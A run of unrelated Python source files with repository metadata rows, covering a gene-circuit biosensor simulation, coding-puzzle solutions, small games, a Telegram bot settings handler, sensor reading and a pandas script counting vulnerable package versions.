    t  -- time (unused directly; dynamics are autonomous)
    GR -- repressor gene concentration (constant input)
    TO -- total operator concentration; free operator O is recovered as TO - R2O
    TA -- total analyte (lead); free analyte A is recovered via (TA - A)/2 terms
    Returns the list of time derivatives in the same order as z.
    """
    #Initialize variables in a vector
    mR = z[0] #repressor mRNA
    R = z[1] #repressor monomer
    R2 = z[2] #repressor dimer #R2O - free operator of reporter gene
    A = z[3] #analyte #R2A2 - repressor-operator complex
    O = z[4] #inactive repressor
    mF = z[5] #reporter mRNA
    Fin = z[6] #inactive reporter
    F = z[7] #reporter  # NOTE(review): F is unpacked but unused in any derivative below
    TLR = z[8] #Translation resources
    #ODEs
    dmRdt = (vTX2*(GR**2)/((KTX2**2)+(GR**2))) - lam_m2*mR #Repressor mRNA Conc
    dRdt = (kTL2*TLR*(mR**3)/((KTL2**3)+(mR**3)+(mF**3))) - 2*k2R*(R**2) + 2*k_2R*R2 #Repressor Conc
    dR2dt = k2R*(R**2) - k_2R*R2 - kr*R2*O + k_r*(TO-O) - kdr1*(A**2)*R2 + k_dr1*((TA-A)/2) #Repressor dimer Conc
    dAdt = -2*kdr1*(A**2)*R2 + 2*k_dr1*((TA-A)/2) - 2*kdr2*(A**2)*(TO-O) + 2*k_dr2*O*((TA-A)/2) #Analyte Conc
    dOdt = -kr*R2*O + k_r*(TO-O) + kdr2*(A**2)*(TO-O) - k_dr2*O*((TA-A)/2) #Operator Conc
    dmFdt = (vTX1*(O**2)/((KTX1**2)+(O**2))) - lam_m1*mF + kleak*(TO-O) #Reporter mRNA Conc
    dFindt = (kTL1*TLR*(mF**3)/((KTL1**3)+(mF**3)+(mR**3))) - kmat*Fin #Inactive Reporter Conc
    dFdt = kmat*Fin #Active Reporter Conc
    dTLRdt = -vlamTLR*TLR/((KlamTLR)+(TLR)) #Translation Resources Conc
    return [dmRdt, dRdt, dR2dt, dAdt, dOdt, dmFdt, dFindt, dFdt, dTLRdt]
#Initial Conditions, conc in nM
mR0 = 0
R0 = 0
R20 = 0
R21 = 300
R2O0 = 0
R2A20 = 0
mF0 = 0
Fin0 = 0
f0 = 0
TLR0 = 1520
O0 = 8
GR0 = 8
GR3 = 0
A0 = 0 #Lead Concentration
A1 = 1e5
TO0 = O0 + R2O0 #LOOK AT THIS----------------------<<<<<<
t = np.linspace(0,300,100000)
#-------------VARYING CONC OF LEAD----------------
# Sweep total lead over 8 decades (1e-4 .. 1e3 nM), integrate the circuit for
# each dose, and collect endpoint concentrations (index 99999 = last time point).
F = []
F_in = []
F_O = []
F_R2 = []
F_R2O = []
F_R2A2 = []
LD = []
AZ = []
Ld = []
GFP = []
k = 0
for i in range(-4,4):
    j = 10**(i)
    TA = j + 2*R2A20
    z = [mR0,R0,R20,j,O0,mF0,Fin0,f0,TLR0]
    y,az = odeint(model,z,t,args=(GR0,TO0,TA), full_output=True, atol = 1e-21, mxstep=5000000) #, hmax = ?? TRY Stuff....
    AZ.append(az)
    F.append(y[:,7])
    F_in.append(y[:,6])
    Ld.append(j/1000) #Total Lead in the System
    F_R2.append(y[99999][2]) #Repressor Dimer Concentration
    LD.append(y[99999][3]) #Free Lead Concentration
    F_O.append(y[99999][4]) #Free Operator Concentration
    F_R2A2.append((TA - LD[k])/2)
    F_R2O.append(TO0 - F_O[k])
    # 0.6022 converts nM to molecules -- presumably per some fixed volume; TODO confirm.
    plt.plot(t,F[k]*0.6022,'g-', linewidth = 0.2*(k+1))
    r = '%.1E' % Decimal(j)
    print('At Lead Conc ',r,', GFP : ',F[k][99999])
    GFP.append(F[k][99999])
    k+=1
#print(np.shape(F_R2))
plt.xlabel('Time (min)')
plt.ylabel('molecules of RFP')
plt.show()
# Dose-response curve of endpoint reporter vs total lead.
q=[]
q[:] = [A*0.6022 for A in GFP]
plt.plot(Ld,q,'bo')
plt.xscale('log')
plt.xlabel('Lead (μM)')
plt.ylabel('molecules of RFP')
plt.show()
plt.plot(Ld,F_R2,'bo', label = 'Free Repressor Dimer')
plt.xscale('log')
plt.xlabel('Lead (μM)')
plt.ylabel('Free Repressor Dimer (nM)')
plt.legend()
plt.show()
plt.plot(Ld,F_R2O,'go', label = 'Repressor bound to Promoter')
plt.xlabel('Lead (μM)')
#plt.xscale('log')
plt.ylabel('Repressor bound to Promoter (nM)')
plt.legend()
plt.show()
plt.plot(Ld,F_R2A2,'ro', label = 'Repressor bound to Lead')
#plt.xscale('log')
#plt.yscale('log')
plt.xlabel('Lead (μM)')
plt.ylabel('Repressor bound to Lead (nM)')
plt.legend()
plt.show()
plt.plot(Ld,LD,'bo', label = 'Free Lead')
#plt.xscale('log')
#plt.yscale('log')
plt.xlabel('Lead (μM)')
plt.ylabel('Free Lead (nM)')
plt.legend()
plt.show()
| ShubhankarLondhe/iGEM | Biosensor/Biosensor t vs GFP.py | Biosensor t vs GFP.py | py | 5,532 | python | en | code | 2 | github-code | 90 |
36556438089 | import json
import os
import pickle
class FileDB:
    """Tiny file-backed key/value store: every key is pickled to its own file."""

    def __init__(self, cache_dir):
        self.cache_dir = cache_dir
        # Create the backing directory lazily on first use.
        if not os.path.exists(cache_dir):
            os.makedirs(cache_dir)

    def _path(self, key):
        # One file per key, directly inside the cache directory.
        return os.path.join(self.cache_dir, key)

    def get(self, key):
        """Return the stored value for *key*, or None on any failure
        (missing key, unreadable file, corrupt pickle)."""
        try:
            with open(self._path(key), 'rb') as handle:
                return pickle.load(handle, encoding='utf-8')
        except Exception:
            return None

    def put(self, key, value):
        """Pickle *value* under *key*, overwriting any previous entry."""
        with open(self._path(key), 'wb') as handle:
            pickle.dump(value, handle)
if __name__ == "__main__":
    # Smoke test for FileDB.  Keys must match between put() and get().
    cache = FileDB('/Users/alexsouza/projects/my/opensource/chat-commander/file_db')
    cache.put('test.json', json.dumps({'test_key1': 'test', 'test_key2': 'test'}).encode('utf-8'))
    cache.put('test2.json', json.dumps([{'test_key1': 'test', 'test_key2': 'test'}]).encode('utf-8'))
    # BUG FIX: values were written under 'test.json'/'test2.json' but read back
    # as 'test'/'test2'; get() then returned None and json.loads(None) raised
    # TypeError.  Read back with the same keys that were written.
    print(json.loads(cache.get('test.json')))
    print(json.loads(cache.get('test2.json')))
    print(cache.get('test3'))  # never written -> demonstrates the None path
| apssouza22/chatflow | server/src/core/common/file_db.py | file_db.py | py | 958 | python | en | code | 95 | github-code | 90 |
72201259498 | # Hard
# You're fiven three inputs, all of which are instances of an Orgchart class that have a directReports property
# pointing to their direct reports (children). The first input is the top manager in an organizational chart, and the other
# two inputs are reports in the organizational chart. The two reports are guaranteed to be distinct.
# Write a function taht returns the lowest common manager to the two reports.
# Sample Input
# topManager = Node A
# reportOne = Node E
# reportTwo = Node I
# A
# / \
# B C
# / \ / \
# D E F G
# / \
# H I
# Sample Output
# Node B
def getLowestCommonManager(topManager, reportOne, reportTwo):
    """Return the lowest manager that has both reports somewhere below it.

    Post-order DFS.  Each call tells its parent what it found in its subtree:
    one of the targets, the already-resolved common manager, or None.  Assumes
    both reports exist in the chart, as the problem statement guarantees.
    O(n) time, O(d) space for the recursion (d = chart depth).
    """
    # A target node is the answer for its own subtree.
    if topManager == reportOne:
        return reportOne
    if topManager == reportTwo:
        return reportTwo

    found_one = found_two = False
    for direct in topManager.directReports:
        outcome = getLowestCommonManager(direct, reportOne, reportTwo)
        if outcome == reportOne:
            found_one = True
        elif outcome == reportTwo:
            found_two = True
        elif outcome is not None:
            # A deeper call already located the common manager; bubble it up.
            return outcome

    if found_one and found_two:
        # This node is the split point: one report on each side.
        return topManager
    if found_one:
        return reportOne
    if found_two:
        return reportTwo
    return None
# This is an input class. Do not edit.
class OrgChart:
    # Problem-supplied input node: a name plus the list of direct reports
    # (children).  The tree shape is built by appending to directReports.
    def __init__(self, name):
        self.name = name
        self.directReports = []
## T = O(n); S = O(d) | ArmanTursun/coding_questions | AlgoExpert/Recursion/Hard/Lowest Common Manager/Lowest Common Manager.py | Lowest Common Manager.py | py | 1,579 | python | en | code | 0 | github-code | 90 |
18297589649 | import sys
import math
from collections import defaultdict
sys.setrecursionlimit(10**7)  # deep recursion headroom for competitive programming
def input():
    # Shadow builtin input() with a faster stdin read; [:-1] strips the newline.
    return sys.stdin.readline()[:-1]
mod = 10**9 + 7  # common contest modulus (unused in this particular solve)
def I(): return int(input())  # read one int
def II(): return map(int, input().split())  # read a line of ints (lazy map)
def III(): return list(map(int, input().split()))  # read a line of ints (list)
def Line(N,num):
    # Read N lines of `num` columns and return them transposed (column lists).
    if N<=0:
        return [[] for _ in range(num)]
    elif num==1:
        return [I() for _ in range(N)]
    else:
        read_all = [tuple(II()) for _ in range(N)]
        return map(list, zip(*read_all))
#################
import cmath
pi = cmath.pi
exp = cmath.exp
def convolution(a,b):
    """Integer convolution of lists a and b via a complex FFT.

    Pads both inputs to a power-of-two length, transforms, multiplies
    pointwise, inverse-transforms, and rounds back to ints.  The inner fft
    is an iterative out-of-place transform that ping-pongs between `a` and
    `tmp` each pass (p tracks which buffer holds the current data).
    """
    def fft(a,sz,inv=False):
        tmp = [0]*sz
        mask = sz-1  # sz is a power of two, so & mask == % sz
        p = 0        # pass counter; parity selects source/destination buffer
        i = sz>>1
        sign = 1 if inv else -1  # conjugate twiddles for the inverse transform
        while i:
            if p&1:
                cur,nex = tmp,a
            else:
                cur,nex = a,tmp
            ei = exp(2j*pi*i*sign/sz)
            w = 1
            for j in range(0,sz,i):
                for k in range(i):
                    nex[j+k] = cur[((j<<1)&mask)+k] + w*cur[(((j<<1)+i)&mask)+k]
                w *= ei
            p += 1
            i >>= 1
        if p&1:
            a,tmp = tmp,a  # make sure `a` holds the final pass's output
        if inv:
            a = list(map(lambda x: x/sz, a))  # 1/sz normalisation on the inverse
        return a
    sz = 1<<(len(a)+len(b)-2).bit_length()
    a = a + [0]*(sz-len(a))
    b = b + [0]*(sz-len(b))
    fa = fft(a,sz)
    fb = fft(b,sz)
    fafb = [fai*fbi for fai,fbi in zip(fa,fb)]
    ab = fft(fafb,sz,inv=True)
    # NOTE(review): len(a)/len(b) are the *padded* lengths here, so this slice
    # returns 2*sz-1 entries -- presumably the original lengths were intended;
    # harmless for the caller below, which indexes well inside the result.
    return [round(x.real) for x in ab[:len(a)+len(b)-1]]
# Pick M pairs of cards maximising the sum of pairwise "handshake" values:
# conv[k] counts ordered pairs (including self-pairs) whose values sum to k.
N,M = II()
A = III()
h = [0]*(max(A))
for a in A:
    h[a-1] += 1  # histogram of card values, shifted to 0-based
conv = [0,0] + convolution(h,h)  # conv[k] = #pairs summing to k (1-based sums)
ans = 0
# Greedily take pairs with the largest sums first.
for k in range(2,2*max(A)+1)[::-1]:
    if conv[k]<M:
        ans += k*conv[k]
        M -= conv[k]
    else:
        ans += k*M
        break
print(ans) | Aasthaengg/IBMdataset | Python_codes/p02821/s153574787.py | s153574787.py | py | 1,794 | python | en | code | 0 | github-code | 90 |
44179403050 | # -----------------------------------------------------------
# 424. Longest Repeating Character Replacement
# You are given a string s and an integer k. You can choose any character of the string and change it to any other uppercase English character. You can perform this operation at most k times.
# Return the length of the longest substring containing the same letter you can get after performing the above operations.
# Example 1:
# Input: s = "ABAB", k = 2
# Output: 4
# Explanation: Replace the two 'A's with two 'B's or vice versa.
# Example 2:
# Input: s = "AABABBA", k = 1
# Output: 4
# Explanation: Replace the one 'A' in the middle with 'B' and form "AABBBBA".
# The substring "BBBB" has the longest repeating letters, which is 4.
# -----------------------------------------------------------
from typing import List
import collections
# Inital Solution
# O(mn) time where m is the number of unique characters and n is the length of the string
# Slow sliding window
class Solution:
    # NOTE(review): this brute-force class is shadowed by the second
    # `class Solution` defined later in the file; it is effectively dead code
    # kept for comparison.  O(26*n): re-runs a window scan per distinct letter.
    def characterReplacement(self, s: str, k: int) -> int:
        start, end, highest, count = 0, 0, 0, 0
        # window capture section of same char string
        # go down, with tolerance of k times
        # store highest and go back to first time its different
        # dictionary to store first time
        a = [0] * 26  # presence flags for 'A'..'Z' (assumes uppercase input)
        for x in s:
            if a[ord(x) - ord("A")] == 0:
                a[ord(x) - ord("A")] = 1
        for ind, n in enumerate(a):
            if n == 0:
                continue
            i = chr(ord("A") + ind)  # target letter for this scan
            count = 0
            end = 0
            start = 0
            while end < len(s):
                # case where you continue the trek since same char
                highest = max(highest, end-start)
                if s[end] == i:
                    end += 1
                else:
                    # if we havent used up all k
                    if count < k:
                        end += 1
                        count += 1
                        continue
                    else:
                        # first save highest value
                        while start < end and count >= k:
                            if s[start] != i:
                                count -= 1
                            start += 1
                        if start == end:
                            start += 1
                            end += 1
                        highest = max(highest, end-start)
        return highest
class Solution:
    def characterReplacement(self, s: str, k: int) -> int:
        """Length of the longest substring made uniform with at most k edits.

        Sliding window that never shrinks: the window stays valid as long as
        (window size - count of its dominant character) <= k; otherwise it
        slides right by one.  The final window size is the answer.  O(n).
        """
        counts = collections.defaultdict(int)
        window_start = 0
        dominant = 0  # sentinel key; counts[0] stays 0 until a real char leads
        for idx, ch in enumerate(s):
            counts[ch] += 1
            if counts[ch] > counts[dominant]:
                dominant = ch
            # More than k characters would need replacing -> slide, don't grow.
            if idx - window_start + 1 - k > counts[dominant]:
                counts[s[window_start]] -= 1
                window_start += 1
        return len(s) - window_start
| a22yuen/DSA | 3-sliding-windows/424-longest-repeating-character-replacement.py | 424-longest-repeating-character-replacement.py | py | 3,467 | python | en | code | 2 | github-code | 90 |
30883881674 | import csv
def ow_iter_sensory(fn):
    """Yield (neuron, neurotransmitter, landmark) triples from a sensory CSV."""
    with open(fn) as handle:
        for record in csv.DictReader(handle):
            yield record['Neuron'], record['Neurotransmitter'], record['Landmark']
def ow_iter_connectome(fn):
    """Yield ((origin, target), (neurotransmitter, connection_type), count)
    for every edge row of a connectome CSV."""
    with open(fn) as handle:
        for record in csv.DictReader(handle):
            pair = (record['Origin'], record['Target'])
            # e.g. Generic_GJ | Dopamine | ... paired with GapJunction | Send
            kind = (record['Neurotransmitter'], record['Type'])
            yield pair, kind, int(record['Number of Connections'])
def ow_iter_muscle(fn):
    """Yield ((neuron, muscle), neurotransmitter, count) from a muscle CSV."""
    with open(fn) as handle:
        for record in csv.DictReader(handle):
            yield (record['Neuron'], record['Muscle']), record['Neurotransmitter'], int(record['Number of Connections'])
| obogames/wyrm | connectome/readers/openworm.py | openworm.py | py | 927 | python | en | code | 2 | github-code | 90 |
14770582542 | n = int(input())
# Count how many of the n input strings are palindromes.
ans = 0
for i in range(n):
    s = input()
    flag = True
    m = len(s)
    # Compare each character with its mirror; symmetric pairs checked twice.
    for j in range(m):
        if s[j] != s[(m-1)-j]:
            flag = False
    if flag:
        ans += 1
print(ans) | kaneda05/algo | 1/full_search/4/5.py | 5.py | py | 211 | python | en | code | 0 | github-code | 90 |
23540232784 | from turtle import Turtle
FONT1 = ("Courier", 24, "normal")
FONT2 = ("Courier", 18, "normal")  # NOTE(review): defined but currently unused


class ScoreBoard(Turtle):
    """Heads-up display for the crossing game: shows the current level, and
    the game-over banner once the run ends."""

    def __init__(self):
        super().__init__()
        self.level = 1
        # Lift the pen before moving so no stray line is drawn to the corner.
        self.penup()
        self.pencolor("black")
        self.goto(-270, 250)
        self.write_score()
        self.hideturtle()

    def level_up(self):
        """Advance one level and refresh the on-screen counter."""
        self.level += 1
        self.write_score()

    def write_score(self):
        """Erase the previous text and redraw the level in the top-left."""
        self.clear()
        self.write(arg=f'Level: {self.level}', align="left", font=FONT1)

    def game_over(self):
        """Wipe the HUD and announce the final score in the screen centre."""
        self.clear()
        self.goto(0, 0)
        self.write(arg=f'GAME OVER\nYour Score: {self.level}',
                   align="center", font=FONT1)
| hantn16/100daysPython | turtle_crossing/scoreboard.py | scoreboard.py | py | 703 | python | en | code | 0 | github-code | 90 |
38918059026 | import logging
from typing import Iterable, List
import numpy as np
from sklearn.model_selection import train_test_split
from torch.utils.data import DataLoader
from src.data.datasets import TorchTransformableSubset, TorchImageDataset
class BaseDataHandler(object):
    """Holds the common configuration shared by data handlers.

    dataset              -- the full TorchImageDataset to be split/loaded
    batch_size           -- mini-batch size for the DataLoaders
    num_workers          -- DataLoader worker process count
    transformation_dicts -- optional list of {split_name: transform} dicts
    random_state         -- seed for reproducible splits
    drop_last_batch      -- whether DataLoaders drop the final partial batch
    """
    def __init__(
        self,
        dataset: TorchImageDataset,
        batch_size: int = 64,
        num_workers: int = 10,
        transformation_dicts: List[dict] = None,
        random_state: int = 42,
        drop_last_batch: bool = True,
    ):
        self.dataset = dataset
        self.batch_size = batch_size
        self.num_workers = num_workers
        self.transformation_dicts = transformation_dicts
        self.random_state = random_state
        self.drop_last_batch = drop_last_batch
class DataHandler(BaseDataHandler):
    """Splits a labelled image dataset into stratified train/val/test subsets
    and builds the matching PyTorch DataLoaders."""
    def __init__(
        self,
        dataset: TorchImageDataset,
        batch_size: int = 64,
        num_workers: int = 10,
        transformation_dicts: List[dict] = None,
        random_state: int = 42,
        drop_last_batch: bool = True,
    ):
        super().__init__(
            dataset=dataset,
            batch_size=batch_size,
            num_workers=num_workers,
            transformation_dicts=transformation_dicts,
            random_state=random_state,
            drop_last_batch=drop_last_batch,
        )
        # Populated by stratified_train_val_test_split / get_data_loader_dict.
        self.train_val_test_datasets_dict = None
        self.data_loader_dict = None
    def stratified_train_val_test_split(self, splits: Iterable) -> None:
        """Split the dataset into train/val/test subsets, stratified by label.

        splits -- (train, val, test) portions summing to 1; the val portion is
        rescaled because the second split operates on the train+val remainder.
        """
        train_portion, val_portion, test_portion = splits[0], splits[1], splits[2]
        indices = np.array(list(range(len(self.dataset))))
        labels = np.array(self.dataset.labels)
        train_and_val_idc, test_idc = train_test_split(
            indices,
            test_size=test_portion,
            stratify=labels,
            random_state=self.random_state,
        )
        train_idc, val_idc = train_test_split(
            train_and_val_idc,
            test_size=val_portion / (1 - test_portion),
            stratify=labels[train_and_val_idc],
            random_state=self.random_state,
        )
        logging.debug(
            "Data split on FoV image level ( {} training images, {} validation images,"
            " {} test images).".format(len(train_idc), len(val_idc), len(test_idc))
        )
        train_dataset = TorchTransformableSubset(
            dataset=self.dataset, indices=train_idc
        )
        val_dataset = TorchTransformableSubset(dataset=self.dataset, indices=val_idc)
        test_dataset = TorchTransformableSubset(dataset=self.dataset, indices=test_idc)
        self.train_val_test_datasets_dict = {
            "train": train_dataset,
            "val": val_dataset,
            "test": test_dataset,
        }
        logging.debug(
            "Training samples: {}, validation samples: {}, test samples: {}.".format(
                len(train_idc), len(val_idc), len(test_idc)
            )
        )
    def get_data_loader_dict(self, shuffle: bool = True,) -> None:
        """Attach per-split transform pipelines (if configured) and build one
        DataLoader per split; only the training loader is shuffled.

        Requires stratified_train_val_test_split to have been called first.
        """
        if self.transformation_dicts is not None:
            if len(self.transformation_dicts) > 0:
                # transformation_dicts is a list of {split: transform}; collect
                # the pipeline for each split across all dicts, in order.
                for k in self.transformation_dicts[0].keys():
                    self.train_val_test_datasets_dict[k].set_transform_pipeline(
                        [
                            self.transformation_dicts[i][k]
                            for i in range(len(self.transformation_dicts))
                        ]
                    )
        data_loader_dict = {}
        for k, dataset in self.train_val_test_datasets_dict.items():
            data_loader_dict[k] = DataLoader(
                dataset=dataset,
                batch_size=self.batch_size,
                shuffle=shuffle and k == "train",
                num_workers=self.num_workers,
                drop_last=self.drop_last_batch,
            )
        self.data_loader_dict = data_loader_dict
| GVS-Lab/chromark | src/helper/data.py | data.py | py | 3,925 | python | en | code | 0 | github-code | 90 |
35433823075 | from collections import Counter
class Solution:
    def frequencySort(self, s: str) -> str:
        """Return *s* rearranged so characters appear by decreasing frequency.

        Bucket sort on frequency: bucket[f] holds the characters that occur
        exactly f times.  O(n) time and space; ties keep Counter's
        first-seen order.
        """
        counts = Counter(s)
        # A frequency can be anything from 1 up to len(s) inclusive.
        bucket = [-1] * (len(s) + 1)
        for letter, freq in counts.items():
            if bucket[freq] == -1:
                bucket[freq] = []
            bucket[freq].append(letter)
        pieces = []
        # BUG FIX: the loop previously started at len(s) - 1, so a string made
        # of one repeated character (freq == len(s)) produced "".
        for freq in range(len(s), 0, -1):
            if bucket[freq] != -1:
                for letter in bucket[freq]:
                    pieces.append(letter * freq)
        # join() avoids the quadratic += concatenation of the original.
        return ''.join(pieces)
def main():
    # Quick manual check of frequencySort on the LeetCode sample input.
    s = "tree"
    res = Solution().frequencySort(s)
    # NOTE(review): "eert" is one valid answer; this implementation emits
    # letters in Counter insertion order, so the actual output is "eetr".
    print(f'expected::eert, got::{res}')
if __name__ == '__main__':
    main()
| kateshostak/leetcode | sort_characters_by_frequency.py | sort_characters_by_frequency.py | py | 625 | python | en | code | 0 | github-code | 90 |
30959301137 | import pygame
from plane_sprites import *
# Frames per second for the game loop
FRAME_PER_SEC = 120
# Custom pygame events: enemy spawn timer and hero autofire timer
CREATE_ENEMY_EVENT = pygame.USEREVENT
HERO_FIRE_EVENT = pygame.USEREVENT + 1
class PlaneGame(object):
    """Main controller for the plane-shooter: window, clock, sprites, loop."""
    def __init__(self):
        print("游戏初始化。。。")
        # 1. Create the screen surface
        self.screen = pygame.display.set_mode(SCREEN_RECT.size)
        # Set the window title
        pygame.display.set_caption("飞机大战")
        # 2. Create the clock object
        self.clock = pygame.time.Clock()
        # 3. Private helper builds all sprites and sprite groups
        self.__create_sprites()
        # 4. Arm the timers: spawn an enemy every 1s, fire every 0.5s
        pygame.time.set_timer(CREATE_ENEMY_EVENT, 1000)
        pygame.time.set_timer(HERO_FIRE_EVENT, 500)
    def __create_sprites(self):
        # Two stacked backgrounds scroll together for a seamless loop.
        background1 = BackGroundSprites()
        background2 = BackGroundSprites(0, -SCREEN_RECT.height)
        # background2.rect.y = -SCREEN_RECT.h
        self.background_group = pygame.sprite.Group(background1, background2)
        # Enemy sprite group (filled by the spawn timer)
        self.enemy_group = pygame.sprite.Group()
        # Hero sprite and its group
        self.hero = Hero()
        self.hero_group = pygame.sprite.Group(self.hero)
    def start_game(self):
        """Run the main loop: tick, handle events, collide, redraw."""
        print("游戏开始了。。。")
        while True:
            # 1. Cap the frame rate
            self.clock.tick(FRAME_PER_SEC)
            # 2. Event handling
            self.__event_handler()
            # 3. Collision detection
            self.__check_collide()
            # 5. Update and redraw sprites
            self.__update_sprites()
            # 6. Flip the display
            pygame.display.update()
    def __event_handler(self):
        """Event handling: quit, timed spawns/fire, and arrow/WASD movement."""
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                PlaneGame.__game_over()
            elif event.type == CREATE_ENEMY_EVENT:
                # print("敌机出现喽、、、")
                enemy = Enemy()
                self.enemy_group.add(enemy)
            elif event.type == HERO_FIRE_EVENT:
                self.hero.fire()
        # get_pressed() returns a tuple with 1 for every currently-held key
        key_pressed = pygame.key.get_pressed()
        if key_pressed[pygame.K_RIGHT] == 1 or key_pressed[pygame.K_d] == 1:
            # move right
            self.hero.speed = 2
        elif key_pressed[pygame.K_LEFT] == 1 or key_pressed[pygame.K_a] == 1:
            self.hero.speed = -2
        else:
            self.hero.speed = 0
    def __check_collide(self):
        """Collision detection: bullets destroy enemies; any enemy touching
        the hero ends the game."""
        pygame.sprite.groupcollide(self.hero.bullets, self.enemy_group, True, True)
        enemies = pygame.sprite.spritecollide(self.hero, self.enemy_group, True)
        if len(enemies) > 0:
            self.hero.kill()
            PlaneGame.__game_over()
    def __update_sprites(self):
        """Advance and draw every sprite group onto the screen surface."""
        self.background_group.update()
        self.background_group.draw(self.screen)
        self.enemy_group.update()
        self.enemy_group.draw(self.screen)
        self.hero_group.update()
        self.hero_group.draw(self.screen)
        self.hero.bullets.update()
        self.hero.bullets.draw(self.screen)
    @staticmethod
    def __game_over():
        """Game over: unload all pygame modules and exit the process."""
        pygame.quit()
        exit()
if __name__ == '__main__':
    game = PlaneGame()
    game.start_game()
| xiaojie25/PlaneGame | planr_main.py | planr_main.py | py | 3,582 | python | en | code | 1 | github-code | 90 |
20732798152 | import time
from pi_sht1x import SHT1x as sht
import RPi.GPIO as GPIO
GPIO.setwarnings(False)
# BCM pin numbers for the SHT1x data and clock lines.
dat = 2
sck = 3
# The context manager releases the GPIO pins when the read is done.
with sht(dat, sck, gpio_mode = GPIO.BCM) as sensor:
    temperature = sensor.read_temperature()
    # Humidity is temperature-compensated, hence the argument.
    humidity = sensor.read_humidity(temperature)
    print("temperature: {}".format(temperature))
    print("humidity: {}".format(humidity))
| VladTomici14/Rusty6 | code/sht.py | sht.py | py | 346 | python | en | code | 1 | github-code | 90 |
19255635685 | from sys import stdin
from collections import deque
# Redirect "stdin" to a local file for offline testing (shadows sys.stdin).
stdin = open("./input.txt", "r")
num_of_cards = int(stdin.readline())
num_of_choose = int(stdin.readline())
# Each remaining line holds one card's digits.
cards = []
for _ in range(num_of_cards):
    cards.append(int(stdin.readline()))
answer = set()
def dfs(cur_idx, visited, temp):
    """Backtracking search: build every ordered pick of num_of_choose cards,
    recording each concatenated digit string in the global `answer` set
    (the set deduplicates picks that spell the same number)."""
    # Take the current card.
    visited[cur_idx] = True
    temp.append(cards[cur_idx])
    if len(temp) < num_of_choose:
        # Extend the partial sequence with every still-unused card.
        for candidate in range(num_of_cards):
            if not visited[candidate]:
                dfs(candidate, visited, temp)
    elif len(temp) == num_of_choose:
        # Complete sequence: record its digit-concatenated form.
        answer.add(''.join(map(str, temp)))
    # Undo the choice before returning to the caller.
    temp.pop()
    visited[cur_idx] = False
def main():
    # Start a fresh DFS from every card and print how many distinct numbers
    # can be formed.
    visited = [False] * num_of_cards
    for idx in range(num_of_cards):
        if not visited[idx]:  # always True here; visited is reset inside dfs
            dfs(idx, visited, deque())
    print(len(answer))
if __name__ == '__main__':
main() | ag502/algorithm | Problem/BOJ_5568_카드 놓기/main.py | main.py | py | 860 | python | en | code | 1 | github-code | 90 |
72328682857 | from aiogram import types
from bot.common.keyboard_fabrics import (currency_cb, delete_account_cb,
lang_cb, menu_cb, notification_cb,
notification_payout_cb)
from bot.handlers.text.base_command_handler import BaseCommandHandler
from database.user_repo import UserRepository
class CmdSettings(BaseCommandHandler):
    """Handler for the /settings command: replies with a 2-column inline
    keyboard of account-settings actions.

    `_` is the per-user localisation dict (message key -> translated text);
    the callback factories encode which handler picks each button up.
    """
    async def handle(self, message: types.Message, user: UserRepository, _: dict):
        inline_keyboard_markup = types.InlineKeyboardMarkup(row_width=2)
        # Row 1: delete account / change language
        inline_keyboard_markup.row(
            types.InlineKeyboardButton(
                _["delete_account"],
                callback_data=delete_account_cb.new(
                    id="_", action="choose"
                ),
            ),
            types.InlineKeyboardButton(
                _['language'],
                callback_data=lang_cb.new(
                    id="_",
                ),
            ),
        )
        # Row 2: notification toggle / coin selection
        inline_keyboard_markup.row(
            types.InlineKeyboardButton(
                _["notifcation_button"],
                callback_data=notification_cb.new(
                    action="_",
                ),
            ),
            types.InlineKeyboardButton(
                _['change_coins_button'],
                callback_data=menu_cb.new(
                    id="_", type="account", action="c_coins"
                ),
            ),
        )
        # Row 3: payout notifications / currency list
        inline_keyboard_markup.row(
            types.InlineKeyboardButton(
                _["notifcation_payout_button"],
                callback_data=notification_payout_cb.new(
                    action="_",
                ),
            ),
            types.InlineKeyboardButton(
                _["curr_list_button"],
                callback_data=currency_cb.new(
                    action="open", id="_",
                ),
            ),
        )
        await message.answer(_['setting_descr'], reply_markup=inline_keyboard_markup)
    # The dispatcher invokes the handler instance directly.
    __call__ = handle
| Forevka/Emcd | bot/handlers/text/settings_command.py | settings_command.py | py | 2,029 | python | en | code | 2 | github-code | 90 |
20538273416 | # libraries
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from requests import head
import seaborn as sns
# # set seaborn style
# sns.set_theme()
# df = pd.read_csv ('vuln-versions.csv')
# # print(df)
# #print(df[df.columns[1]])
# # Data
# x=range(1,183)
# df[df.columns[2]] = df[df.columns[2]].replace(0,1)
# # print(df)
# diff = df[df.columns[1]].sub(df[df.columns[2]], fill_value=0)
# y=[ diff, df[df.columns[2]]]
# print(y)
# # Plot
# #ax = plt.stackplot(x,y, labels=['Not vulnerable','Vulnerable'])
# fig, ax = plt.subplots()
# ax.bar(x, diff, label='Not affected',edgecolor = "none")
# ax.bar(x, df[df.columns[2]], bottom=diff, label='Affected',edgecolor = "none")
# plt.legend(loc='upper left')
# plt.xlabel("Packages", labelpad=10)
# plt.ylabel("Number of versions", labelpad=10)
# plt.ylim([0,100])
# plt.tight_layout()
# plt.savefig("versions-surface.pdf")
# Load one CSV per vulnerability class (name, unaffected-version count,
# affected-version count), keep packages with at least one affected version,
# and drop duplicate package names within each class.
df1 = pd.read_csv ('vuln-versions_prototype-pollution.csv', header=None)
df1.columns=['name','not_vulnerable','vulnerable']
# print(df1)
df1 = df1[df1['vulnerable']!=0]
print(len(df1))
df1 = df1.drop_duplicates(subset=['name'])
print(len(df1))
# df_tmp = df1[df1['vulnerable']==0]
# print(df_tmp['name'].tolist())
# print(len(df_tmp['name'].tolist()))
df2 = pd.read_csv ('vuln-versions_redos.csv', header=None)
df2.columns=['name','not_vulnerable','vulnerable']
# print(df)
df2 = df2[df2['vulnerable']!=0]
print(len(df2))
df2 = df2.drop_duplicates(subset=['name'])
print(len(df2))
# df_tmp = df2[df2['vulnerable']==0]
# print(df_tmp['name'].tolist())
# print(len(df_tmp['name'].tolist()))
df3 = pd.read_csv ('vuln-versions_ace-breakout.csv', header=None)
df3.columns=['name','not_vulnerable','vulnerable']
df3 = df3[df3['vulnerable']!=0]
print(len(df3))
df3 = df3.drop_duplicates(subset=['name'])
print(len(df3))
df4 = pd.read_csv ('vuln-versions_command-injection.csv', header=None)
df4.columns=['name','not_vulnerable','vulnerable']
# print(df)
df4 = df4[df4['vulnerable']!=0]
print(len(df4))
df4 = df4.drop_duplicates(subset=['name'])
print(len(df4))
df5 = pd.read_csv ('vuln-versions_path-traversal.csv', header=None)
